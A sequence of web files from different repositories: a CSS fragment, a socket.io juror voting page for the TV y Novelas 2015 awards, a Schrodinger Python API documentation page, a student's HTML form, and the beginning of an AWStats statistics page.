font-family: inherit; padding: 6px; padding: 0.428571429rem; } /* Sidebar */ .widget-area .widget { margin-bottom: 20px; } .widget-area .widget h3 { margin-bottom: 5px; } .widget-title { color: #660000; } .widget-area .widget a { text-decoration: none; } /* Google maps */ #map_canvas{ width: 245px; height: 250px; border: 1px solid #660000; } #map_canvas img{ max-width:none; /*google map infowindow can show correctly.*/ } .zn-gmap{ border: 1px solid #660000; } /* Footer */ footer[role="contentinfo"] { background-color: #660000; margin-top: 0; padding: 0 0 5px 0; } footer[role="contentinfo"] a { color: #ffffff; text-decoration: none; } footer[role="contentinfo"] a:hover { color: #ffffff; text-decoration: underline; } footer .site-info{ border-top: solid 1px #ffffff; } footer .widget-area { margin: 5px 0 0; } footer .widget-area .widget h3 { margin-bottom: 5px; } footer .site-info{ text-align: right; } /*.template-front-page .widget-area.three,*/ #footer-widgets.widget-area.three{ clear: both; float: none; width: auto; padding-top: 0px; padding-left: 14px; /*padding-top: 1.714285714rem; border-top: 1px solid #ededed;*/ } /* =Main content and comment content */ .site-content article { border-bottom: 0px; } /* ===[ Footer Widget Areas ]=== */ .site-info { clear: both; } #footer-widgets { border-top: none; /*float: left;*/ } #footer-widgets .widget-title, #footer-widgets .textwidget{ color: #ffffff; } #footer-widgets .widget li { list-style-type: none; } /* Minimum width of 960 pixels. */ @media screen and (min-width: 960px) { body .site { padding: 0; margin-top: 0; /*48px;*/ margin-bottom: 0; box-shadow: 0 0px 0px rgba(100, 100, 100, 0.3); } } @media screen and (min-width: 600px) { .site-header { padding: 24px 0 0; padding: 1.714285714rem 0 0; } .site-header h1 { margin-bottom: 0; } .site-header h2 { line-height: 1.8262; } .main-navigation li a { border-bottom: 0; color: #fff; } .main-navigation .current-menu-item > a, .main-navigation .current-menu-ancestor > a, .main-navigation .current_page_item > a, .main-navigation .current_page_ancestor > a { color: #660000; } .site-header .site-contact{ float:right; display:block; padding-right: 1rem; padding-right: 14px; margin-top:-50px; color: #515151; font-weight: normal; } .home-widget .widget{ float: left; width: 300px; } .home-widget .widget:first-child{ margin-right: 30px; } .home-widget .widget:last-child{ float: right; } .home-widget a:hover{ text-decoration: none; } .home-widget article{ padding-bottom: 0px; } .home-widget .widget-title { line-height: 2.181818182; background-color: #660000; color: #fff; text-align: center; display: block; font-weight: normal; font-size: 14px; font-size: 1rem; } .home-widget .widget img { border-radius: 0; } /*footer[role="contentinfo"]{ padding: 0 14px; }*/ #footer-widgets { width: 100%; } #footer-widgets.three .widget { clear: none; float: left; margin-right: 1.71429rem; max-width: 29.85%; width: 29.85%; } } /* for IE8 and IE7 */ .ie #footer-widgets.three .widget { float: left; margin-right: 3.1%; width: 29.85%; clear: none; } .ie #footer-widgets.three .widget + .widget + .widget { margin-right: 3.1%; }
public/jurado2/categoria_c.html
alfredoBorboa/tvynovelas-live
<!doctype html> <html> <head> <title>Votación Live Tv y Novelas 2015</title> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" /> <script src="../socket.io/socket.io.js"></script> <script src="../resources/jquery.min.js"></script> <link rel="stylesheet" type="text/css" href="../style.css"> </head> <body> <div id="overlayLogo"><img src="../resources/TVyNovelasWeb.png"/></div> <div id="overlayConfirmacion"> <div id="confirmaVoto"> Por favor confirma tu voto a<br/><br/> <span id="nombreCandidatoVotado"></span><br/><br/><br/> <a href="javascript:void(0)"><div id="btnConfirma">confirmar</div></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:void(0)"><div id="btnCancela">cancelar</div></a> </div> </div> <div id="overlayBlockVoto"></div> <div id="contenedor" > <h1>Mejor Actor</h1> <div id="candidatos"> <a href="javascript:void(0)" valor="cc1j2" class="candidato" ><div class="cuadroCandidato"><div class="imgCandidato"><img src="../resources/imgs/cc1.jpg" width="220" height="220"></div>Sebastián Rulli<br/><i>Lo que la vida me robó</i>&nbsp;</div></a> <a href="javascript:void(0)" valor="cc2j2" class="candidato" ><div class="cuadroCandidato"><div class="imgCandidato"><img src="../resources/imgs/cc2.jpg" width="220" height="220"></div>Jorge Salinas<br/><i>Mi corazón es tuyo</i>&nbsp;</div></a> <a href="javascript:void(0)" valor="cc3j2" class="candidato" ><div class="cuadroCandidato"><div class="imgCandidato"><img src="../resources/imgs/cc3.jpg" width="220" height="220"></div>Erick Elías<br/><i>El color de la pasión</i>&nbsp;</div></a> <a href="javascript:void(0)" valor="cc4j2" class="candidato" ><div class="cuadroCandidato"><div class="imgCandidato"><img src="../resources/imgs/cc4.jpg" width="220" height="220"></div>Gabriel Soto<br/><i>Yo no creo en los hombres</i>&nbsp;</div></a> <a href="javascript:void(0)" valor="cc5j2" class="candidato" ><div class="cuadroCandidato"><div class="imgCandidato"><img src="../resources/imgs/cc5.jpg" width="220" height="220"></div>Daniel Arenas<br/><i>La Gata</i>&nbsp;</div></a> </div><!-- candidatos --> </div><!-- contenedor --> <script> var socket = io(); var mensaje; $( "#candidatos" ).on( 'click', '.candidato', function(){ var valorImagen = $( this ).attr( 'valor' ); var idImagen = valorImagen.split( 'j' ); var mensajeLargo = $( this ).children( ".cuadroCandidato" ).html(); var nombreCandidato = mensajeLargo.replace( "<div class=\"imgCandidato\"><img src=\"../resources/imgs/" + idImagen[ 0 ] + ".jpg\" width=\"220\" height=\"220\"></div>" , ""); $( "#nombreCandidatoVotado" ).html( nombreCandidato ); $( "#overlayConfirmacion" ).fadeToggle( "slow" ); mensaje = $( this ).attr( "valor"); }); $( "#btnConfirma" ).on( 'click', function(){ socket.emit( "votoDesdeJurado", mensaje ); $("*[valor='" + mensaje + "']").children( ".cuadroCandidato" ).children( ".imgCandidato" ).append( "<div id='palomita' style='position:absolute;margin-top:-190px'><img src='../resources/paloma.png'/></div>" ); $( "#overlayConfirmacion" ).fadeToggle( "slow" ); //$( "#candidatos" ).children().click( false ); $( "#overlayBlockVoto" ).show(); return false; }); $( "#btnCancela" ).on( 'click', function(){ $( "#overlayConfirmacion" ).fadeToggle( "slow" ); }); socket.on( "ordenaSegundaVotacion", function( msg ){ $( "#candidatos" ).html( "" ); for( var i = 0; i < ( msg.length / 2 ); i++ ){ var soloNombre = msg[ i ].split( "&nbsp;" ); $( "#candidatos" ).append( "<a href='javascript:void(0)' valor='cc" + msg[ i + ( msg.length / 2 ) ] + "j2' class='candidato' ><div class='cuadroCandidato'><div class='imgCandidato'><img src='../resources/imgs/cc" + msg[ i + ( msg.length / 2 ) ] + ".jpg' width='220' height='220'></div>" + soloNombre[ 0 ] + "</div></a> " ); } //$( "#candidatos" ).children().click( true ); $( "#overlayBlockVoto" ).hide(); realinea(); }); socket.on( "activaOverlayLogoVotante", function( msg ){ if( msg == 1 ){ $( "#overlayLogo" ).fadeIn( "slow" ); } }); socket.on( "desactivaOverlayLogoVotante", function( msg ){ if( msg == 1 ){ $( "#overlayLogo" ).fadeOut( "slow" ); } }); /*socket.on( "siguienteSeccionVotante", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_d.html"; } });*/ //---------------------------------------cues de teclas para llevar a secciones socket.on( "jveaA", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_a.html"; } }); socket.on( "jveaB", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_b.html"; } }); socket.on( "jveaC", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_c.html"; } }); socket.on( "jveaD", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_d.html"; } }); socket.on( "jveaE", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_e.html"; } }); socket.on( "jveaF", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_f.html"; } }); socket.on( "jveaG", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_g.html"; } }); socket.on( "jveaH", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_h.html"; } }); socket.on( "jveaI", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_i.html"; } }); socket.on( "jveaK", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_k.html"; } }); socket.on( "jveaL", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_l.html"; } }); socket.on( "jveaM", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_m.html"; } }); socket.on( "jveaN", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_n.html"; } }); socket.on( "jveaO", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_o.html"; } }); socket.on( "jveaP", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_p.html"; } }); socket.on( "jveaQ", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_q.html"; } }); socket.on( "jveaR", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_r.html"; } }); socket.on( "jveaS", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_s.html"; } }); socket.on( "jveaT", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_t.html"; } }); socket.on( "jveaU", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_u.html"; } }); socket.on( "jveaV", function( msg ){ if( msg == 1 ){ window.location.href = "categoria_v.html"; } }); //---------------------------------------cues de teclas para llevar a secciones socket.on( "recibeRefresh", function( msg ){ if( msg == 1 ){ location.reload(); } }); function realinea(){ var numChildCandidatos = $( "#candidatos" ).children().length; if( numChildCandidatos == 6 ){ $( "#candidatos a:nth-child( 5 )" ).children( ".cuadroCandidato" ).css( "margin-left", "220px" ); } if( numChildCandidatos == 5 ){ $( "#candidatos a:nth-child( 5 )" ).children( ".cuadroCandidato" ).css( "margin-left", "320px" ); } if( numChildCandidatos == 3 ){ $( "#candidatos a:nth-child( 1 )" ).children( ".cuadroCandidato" ).css( "margin-left", "120px" ); } if( numChildCandidatos == 2 ){ $( "#candidatos a:nth-child( 1 )" ).children( ".cuadroCandidato" ).css( "margin-left", "220px" ); } } realinea(); </script> </body> </html>
Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.pipeline.pipeio.Grid-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.pipeline.pipeio.Grid</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> <a href="schrodinger-module.html">Package&nbsp;schrodinger</a> :: <a href="schrodinger.pipeline-module.html">Package&nbsp;pipeline</a> :: <a href="schrodinger.pipeline.pipeio-module.html">Module&nbsp;pipeio</a> :: Class&nbsp;Grid </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="schrodinger.pipeline.pipeio.Grid-class.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== CLASS DESCRIPTION ==================== --> <h1 class="epydoc">Class Grid</h1><p class="nomargin-top"></p> <pre class="base-tree"> <a href="schrodinger.pipeline.pipeio.PipeIO-class.html">PipeIO</a> --+ | <strong class="uidshort">Grid</strong> </pre> <hr /> <p>A class to hold a set of grid files (compressed or uncompressed).</p> <!-- ==================== INSTANCE METHODS ==================== --> <a name="section-InstanceMethods"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Instance Methods</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-InstanceMethods" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#__init__" class="summary-sig-name">__init__</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">gridfile</span>=<span class="summary-sig-default">None</span>)</span></td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#check" class="summary-sig-name">check</a>(<span class="summary-sig-arg">self</span>)</span><br /> Check that the grid file exists.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="getPath"></a><span class="summary-sig-name">getPath</span>(<span class="summary-sig-arg">self</span>)</span><br /> Return the grid file name.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#getData" class="summary-sig-name">getData</a>(<span class="summary-sig-arg">self</span>)</span></td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__str__"></a><span class="summary-sig-name">__str__</span>(<span class="summary-sig-arg">self</span>)</span><br /> Return a string representation of the object.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#setData" class="summary-sig-name">setData</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">gridfile</span>)</span><br /> Replace the grid file name.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#addData" class="summary-sig-name">addData</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">gridfile</span>)</span><br /> Set the grid file name, but only if it hadn't already been set.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#getFiles" class="summary-sig-name">getFiles</a>(<span class="summary-sig-arg">self</span>)</span><br /> Return a list of grid file names, expanded from the representative file name, after checking for their existence.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.pipeline.pipeio.Grid-class.html#isFilled" class="summary-sig-name">isFilled</a>(<span class="summary-sig-arg">self</span>)</span><br /> Check whether the object is used or empty.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.pipeline.pipeio.PipeIO-class.html">PipeIO</a></code></b>: <code><a href="schrodinger.pipeline.pipeio.PipeIO-class.html#getCount">getCount</a></code> </p> </td> </tr> </table> <!-- ==================== METHOD DETAILS ==================== --> <a name="section-MethodDetails"></a> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Method Details</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-MethodDetails" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> </table> <a name="__init__"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">__init__</span>(<span class="sig-arg">self</span>, <span class="sig-arg">gridfile</span>=<span class="sig-default">None</span>)</span> <br /><em class="fname">(Constructor)</em> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <dl class="fields"> <dt>Parameters:</dt> <dd><ul class="nomargin-top"> <li><strong class="pname"><code>gridfile</code></strong> (str) - The name of the grid file (for example, <code>&lt;gridjobname&gt;.grd</code> or <code>&lt;gridjobname&gt;.zip</code>). The value can be changed later with <a href="schrodinger.pipeline.pipeio.Grid-class.html#setData" class="link">setData</a>.</li> </ul></dd> </dl> </td></tr></table> </div> <a name="check"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">check</span>(<span class="sig-arg">self</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Check that the grid file exists.</p> <dl class="fields"> <dt>Raises:</dt> <dd><ul class="nomargin-top"> <li><code><strong class='fraise'>RuntimeError</strong></code> - Raised if the file is missing.</li> </ul></dd> <dt>Overrides: <a href="schrodinger.pipeline.pipeio.PipeIO-class.html#check">PipeIO.check</a> </dt> </dl> </td></tr></table> </div> <a name="getData"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">getData</span>(<span class="sig-arg">self</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <dl class="fields"> </dl> <div class="fields"> <p><strong>Deprecated:</strong> Use <a href="schrodinger.pipeline.pipeio.Grid-class.html#getFiles" class="link">getFiles</a> instead. </p> </div></td></tr></table> </div> <a name="setData"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">setData</span>(<span class="sig-arg">self</span>, <span class="sig-arg">gridfile</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Replace the grid file name.</p> <dl class="fields"> <dt>Parameters:</dt> <dd><ul class="nomargin-top"> <li><strong class="pname"><code>gridfile</code></strong> (str) - The replacement grid file name.</li> </ul></dd> </dl> </td></tr></table> </div> <a name="addData"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">addData</span>(<span class="sig-arg">self</span>, <span class="sig-arg">gridfile</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Set the grid file name, but only if it hadn't already been set.</p> <dl class="fields"> <dt>Raises:</dt> <dd><ul class="nomargin-top"> <li><code><strong class='fraise'>RuntimeError</strong></code> - Raised if the grid file name is already set.</li> </ul></dd> </dl> <div class="fields"> <p><strong>Deprecated:</strong> Set all ligand files in input or via <a href="schrodinger.pipeline.pipeio.Grid-class.html#setData" class="link">setData</a>. </p> </div></td></tr></table> </div> <a name="getFiles"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">getFiles</span>(<span class="sig-arg">self</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Return a list of grid file names, expanded from the representative file name, after checking for their existence.</p> <p>For compressed grids, the <code>.zip</code> file is the only item returned, but for uncompressed grids, all the standard grid component file names are returned.</p> <dl class="fields"> <dt>Overrides: <a href="schrodinger.pipeline.pipeio.PipeIO-class.html#getFiles">PipeIO.getFiles</a> </dt> </dl> </td></tr></table> </div> <a name="isFilled"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">isFilled</span>(<span class="sig-arg">self</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Check whether the object is used or empty.</p> <p>This method must be implemented in subclasses.</p> <dl class="fields"> <dt>Overrides: <a href="schrodinger.pipeline.pipeio.PipeIO-class.html#isFilled">PipeIO.isFilled</a> <dd><em class="note">(inherited documentation)</em></dd> </dt> </dl> </td></tr></table> </div> <br /> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Tue Sep 25 02:23:05 2012 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
Practica2.html
AraceliRey/Programacion4_practica_2
<!DOCTYPE html> <html> <head> <meta name="eecription" content="Ejemplo d HTML"/> <meta name="keywors" content="HTML%;CSS3;JavaScript/> <title>Fomulario</title> </head> <body> <div> <form action="datos.html" method="post"> <fieldset> <legend>Contacto</legend> <label for="txtNombre">Laboral</label><br/> <label for="txtNombre">Emplado</label> <br/> <br/> <label for="txtNombre">codigo</label></br> <input type="password" size="40" maxlength="255" id="txtcodigo" name="codigo" /> <br/> <br/> <label for="txtFechaI">Fecha de Ingreso</label> <input type="text" size="40" maxlength="255" id="txtFechaI" name="FechaI" /> <br/> <br/> <label for="txtnumero">Numero</label> <input type="text" size="40" maxlength="255" id="txtFechaI" name="numero" /> <br/> <br/> <label for="txtSeguridad">Seguridad Social</label></br> <input type="password"size"40" maxlength="255" id="textSeguro" name="Segurdiad" /> <br/> <br/> </fieldset> <fieldset> <legend>Personal</legend> <label for="txtCorreo">Nombre</label><br/> <input type="text" size="40" maxlength="255" id="txtNombre" name="Nombre" /> <br/> <br/> <label for="ApellidoP">Apellido Paterno</label> <input type="text" size="40" maxlength="255" id="txtPaterno" name="paternoP" /> <br/> <br/> <label for="Foto">Foto de Perfil</label><br/> <img src="CNBlue.gif" width="135" height="135"></br> <label for="txtApellidoM">Apellido Materno</label><br/> <input type="text" size="40" maxlength="255" id="txtApellidoM" name="ApellidoM" /> <br/> <br/> <label for="txtSexo"> Sexo</label><br/> <input type="radio" id="pro1" name="sexo" value="1"/> <label for="hombre"> Hombre </label><br/> <input type="radio" id="pro2" name="sexo" value="2"> <label for="mujer"> Mujer </label><br/> <label for="txtEstado Civil">Estado Civil</label><br/> <select> <option value="Casada">Casad@</option> <option value="Soltera">Solter@</option> <option value="Divorciada">Divorciad@</option> <option value="Viudo">Viud@</option> </select> </fieldset> <fieldset> <legend>Nacimiento</legend> <label for="txtFecha">Fecha</label><br/> <input type="text"size="40" maxlength="225" id="txtFecha" name="Fecha"/> <br/> <br/> <label for="txtPais">Pais</label><br/> <select> <option value="Mexico">Mexico</option> <option value="Corea">Corea</option> <option value="Japon">Japon</option> <option value="EUA">EUA</option> <option value="Canada">Canada</option> </select> </fieldset> <fieldset> <legend>Contacto</legend> <label for="Titulo">Titulo</label><br/> <input type="text" size="40" maxlength="255" id="txttitulo" name="Titulo" /> <br/> <br/> <label for="Curp">Curp</label> <input type="text" size="40" maxlength="255" id="txtCurp" name="Curp" /> <br/> <br/> <label for="RFC">RFC</label> <input type="text" size="40" maxlength="255" id="txtRFC" name="RFC" /> <br/> <br/> <label for="Telefono">Telefono</label><br/> <input type="text" size="40" maxlength="255" id="txtTelefono" name="Telefono" /> <br/> <br/> <label for="Celular">Celular</label><br/> <input type="text" size="40" maxlength="255" id="txtCelular" name="Celular" /> <br/> <br/> <label for="Domicilio">Domicilio</label><br/> <input type="text" size="40" maxlength="255" id="txtDomicilio" name="Domicilio" /> <br/> <br/> <label for="Colonia">Colonia</label><br/> <input type="text" size="40" maxlength="255" id="txtColonia" name="Colonia" /> <br/> <br/> <label for="codigoP">Codigo Postal</label><br/> <input type="text" size="40" maxlength="255" id="txtcodigoP" name="codigoP" /> <br/> <br/> <label for="txtPais">Pais</label><br/> <select> <option value="Mexico">Mexico</option> <option value="Corea">Corea</option> <option value="Japon">Japon</option> <option value="EUA">EUA</option> <option value="Canada">Canada</option> </select> <br/> <br/> <label for="Radio">Radio</label><br/> <input type="text" size="40" maxlength="255" id="txtRadio" name="Radio" /> <br/> <br/> <label for="correo">Correo Electronico</label><br/> <input type="text" size="40" maxlength="255" id="txtcorreo" name="correo" /> <br/> <br/> <label for="Observaciones">Observaciones</label></br> <textarea name="Obrvaciones" cools"40" rows="10">Escribe mensaje</textarea> <br/> <br/> </fieldset> <input type="submit" name="Cancelar" value="Cancelar"/> <input type="submit" name="Agregar" value="Agregar"/> </form> </div> </body> </html>
old/webstat/awstats.ckbran.ru.downloads.092013.html
AxelFG/ckbran-inf
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta name="generator" content="AWStats 6.95 (build 1.943) from config file awstats.ckbran.ru.conf (http://awstats.sourceforge.net)"> <meta name="robots" content="noindex,nofollow"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="description" content="Awstats - Advanced Web Statistics for ckbran.ru (2013-09) - downloads"> <title>Statistics for ckbran.ru (2013-09) - downloads</title> <style type="text/css"> <!-- body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; } .aws_bodyl { } .aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; } .aws_title { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; } .aws_blank { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; } .aws_data { background-color: #FFFFFF; border-top-width: 1px; border-left-width: 0px; border-right-width: 0px; border-bottom-width: 0px; } .aws_formfield { font: 13px verdana, arial, helvetica; } .aws_button { font-family: arial,verdana,helvetica, sans-serif; font-size: 12px; border: 1px solid #ccd7e0; background-image : url(/awstatsicons/other/button.gif); } th { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; } th.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; } td { border-color: #ECECEC; border-left-width: 0px; 